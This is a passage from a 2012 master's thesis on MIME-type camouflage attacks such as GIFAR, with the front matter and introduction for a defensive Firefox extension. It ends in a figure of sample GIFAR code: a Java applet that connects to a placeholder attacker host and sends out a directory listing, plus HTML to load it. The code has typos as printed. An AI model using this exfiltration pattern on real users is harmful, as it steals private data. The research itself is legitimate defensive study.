A Framework for Mime Type Identification and Content Filtering In

The Pennsylvania State University The Graduate School Department of Computer Science and Engineering A FRAMEWORK FOR MIME TYPE IDENTIFICATION AND CONTENT FILTERING IN THE FIREFOX WEB BROWSER A Thesis in Computer Science and Engineering by Matthew James Rummel c 2012 Matthew James Rummel Submitted in Partial Fulfillment of the Requirements for the Degree of Master of Science December 2012 The thesis of Matthew James Rummel has been reviewed and approved* by the following: Patrick McDaniel Professor of Computer Science and Engineering Thesis Adviser Trent Jaeger Associate Professor of Computer Science and Engineering Lee Coraor Associate Professor of Computer Science and Engineering Director of Graduate Affairs *Signatures are on file in the Graduate School iii Abstract Modern Web browser architectures allow for extensibility in order to support an evolving variety of content. Each supported plugin interacts with the browser and underlying host through a diverse set of operations that bring new challenges to the security model. These capabilities provide the means for a growing number of attack vectors that leverage the lax MIME type verification utilities in browsers to disguise malicious files. Once loaded by a browser, these objects take advantage of the escalated privileges available to their concealed payload in order to execute commands on the client. Such attacks can be launched from files shared on social media sites, through email, or from a server controlled by the attacker. To protect against these threats, we offer MIME Detector, a Firefox browser extension to identify and monitor the browser's use of loading objects. By utilizing a collection of open source tools and internal browser components, the tool is able to determine the MIME type of incoming content and enforce an acceptable use policy. Our testing shows that this research provides a solid framework towards providing users with a greater level of control over how Web based content interacts with their client. iv Table of Contents List of Tables :::::::::::::::::::::::::::::::::::::: v List of Figures ::::::::::::::::::::::::::::::::::::: vi Acknowledgments ::::::::::::::::::::::::::::::::::: vii Chapter 1. Introduction :::::::::::::::::::::::::::::::: 1 1.1 Camouflaging Malicious Content . 2 1.1.1 GIFAR . 2 1.1.2 Flash and ZIP Archives . 5 1.1.3 Chameleon Files . 6 1.2 Research Statement . 7 Chapter 2. Related Work ::::::::::::::::::::::::::::::: 9 2.1 Client Filtering . 9 2.1.1 String Based Filtering . 10 2.1.2 Control Flow Detection . 12 2.2 Server Filtering . 13 2.2.1 Common Approaches . 14 2.2.2 Automata Based . 15 2.3 Comparison to Project . 16 Chapter 3. Implementation :::::::::::::::::::::::::::::: 18 3.1 User Interface . 18 3.1.1 Site Elements . 18 3.1.2 Settings . 19 3.1.3 Action Log . 22 3.2 Browser Interaction . 23 3.2.1 Channel Proxy . 23 3.2.2 Content Evaluation . 24 3.3 MIME Identification and HTML Parsing . 26 Chapter 4. Evaluation ::::::::::::::::::::::::::::::::: 29 4.1 Rule Set Tests . 29 4.2 MIME Identification Tests . 32 4.3 Web Browsing Test . 34 Chapter 5. Conclusions :::::::::::::::::::::::::::::::: 37 Appendix. Web Browsing Test Results ::::::::::::::::::::::: 40 References :::::::::::::::::::::::::::::::::::::::: 52 v List of Tables 3.1 Monitored HTML tags and their associated reference attribute. 19 4.1 The result of the tag test evaluation. 31 4.2 The results of the camouflaged objects evaluation. 33 A.1 A sample rule set for general Web browsing. 41 A.2 An evaluation of identification results. 44 A.3 A listing of items blocked by the extension. 48 A.4 A comparison of collected performance metrics. 51 vi List of Figures 1.1 Sample Java and HTML code to launch a GIFAR attack that lists a user's files [9]. 4 1.2 A Postscript file modified to contain HTML code and an HTML file with a GIF header [7]. 7 3.1 The user interface tabs . 22 3.2 The stages of a file’s evaluation . 27 vii Acknowledgments I am appreciative of the guidance I have received from my advisor, Dr. Patrick McDaniel. His perspective and feedback were instrumental in leading this thesis to successful completion. I am also grateful for the support of my family and friends. Their unwavering encouragement has always been a positive influence in all of my endeavors. Most of all, I would like to express my deepest gratitude to Allison for her understanding, patience, and reassurance throughout the duration of this project | I couldn't have done it without her. 1 Chapter 1 Introduction The incorporation of Web 2.0 technologies in the World Wide Web has brought substantial changes to both the user experience and security model of Internet applications. As a platform for services and user content, Web based products allow for in- creased ease of collaboration and data dissemination amongst distributed parties. This vast dispersion of files originating from end users combined with the execution of client side code can also be leveraged to compromise the privacy of users and the integrity of their devices. A recent report by Symantec lists blogs and Web communication as the category of websites most frequently utilized to launch such an attack [1]. The report further cites plugins, including Oracle Java; Adobe Flash; and Adobe Acrobat Reader, as commonly providing a mechanism for many malicious exploits. Research has shown these manipulations to include cross site forgeries [8], cross site script attacks [7], and malware [10]. Additionally, it has been revealed that any type of file, even those as seem- ingly benign as images, can be used to exploit properties of Web architectures [9] [7]. Thus, the ability to add media to websites coupled with the requirement that browsers support rich content presents an ongoing challenge in browser security. In this research, we examined a particular category of Web based attacks in which an object loaded into a browser is embedded with the payload of a malicious object of a different MIME type. By disguising malicious files in this manner, attackers are able 2 to circumvent content policies enforced by both browsers and servers. Such attacks have been described as content repurposing by Sundareswaran and Squicciarini [29] and \chameleons" by Barth et al [8]. The objective of this project was to develop a framework to prevent such exploits implemented as a browser extension. 1.1 Camouflaging Malicious Content Regardless of the method used to repurpose content, there are some common characteristics that can be recognized in each approach. Each attack implements some form of digital steganography, or the practice of disguising data by placing it within other data, thereby concealing the secret payload [4]. Although standard MIME types have recognizable signatures, the process of finding all signatures within a given payload of data has proven to be a difficult task at both the client and server. Furthermore, when MIME types are inferred through different recognition techniques, it is possible that the server will identify the object as being of one type, while the client attempts to utilize it as though it were another. The following descriptions exemplify the attack vectors and capabilities of hidden Web content. 1.1.1 GIFAR To date, the most highly publicized repurposing attack is the GIFAR, so named for its construction as a concatenation of an image, such as a GIF and a Java archive, or JAR. The GIFAR vulnerability was presented at the Black Hat USA Conference in 2008 based on research by Billy Rios and Petko Petkov. The attack was regarded as one of the top Web hacking techniques of that year based on its simplicity and ability 3 to compromise a victim's privacy [14]. The vulnerability was patched shortly after the presentation and is no longer a threat in versions of Java since 1.6.0.11 and 1.5.0.17 [9]. A notable property that contributed to the effectiveness of the GIFAR is its distribution through images. While most Web applications will not allow executable code to be uploaded, images are frequently permitted and wildly shared in social media and content management applications. In addition to third party sites, an attacker may consider storing the malicious content on their own domain and attract users to their site through advertisements or other means. Once the GIFAR is stored on a third party server, the attacker must find a way to embed HTML code that enables the JAR to execute. This code can be inserted into the webpage due to lax text input sanitation or other attack methods whereby HTML can be injected. An additional method is to upload the GIFAR to a server and then send an HTML email to the victim. The HTML message would contain the an <a> tag that embeds the <img> tag, thus referencing the GIFAR as a link. When the user clicks on the link, a page is loaded that invokes the applet and thus carries out the attack [29]. The overall extent of the a GIFAR's effectiveness is largely based on the security measures in place on the client, the browser settings, and the security awareness of a potential victim. A number of these scenarios were discussed by Ron Brandis, a researcher at EWA-Australia [9]. If the firewall setting on the user's local machine prohibits the GIFAR from establishing a connection back to a server controlled by the attacker, then no information can be retrieved. If a TCP tunnel can be established, then a fairly low level set of attacks could be launched to return information such as the target's internal IP address, send spam emails, or forward commands to botnets. The 4 // Included in Evil.class in a JAR concatenated to evil.gif public class Evil extends JApplet { public void start() { Socket socket=new Socket(attackerIP, attackterPort); OutDataStream out=new DataOutputStream( sock.getOutputStream()); Process p=Runtime.getRuntime().exec("ls -l"): BufferedReader in= new BufferedReader(new InputStreamReader(p.getInputStream())); String line = ""; while ((line = in.readLine()) !=null) out.writeUTF(line+"\n"); } }  <html > <body > <img src=evil.gif> <applet archive=evil.gif code=Evil.class> </body > </html > Fig.

Load more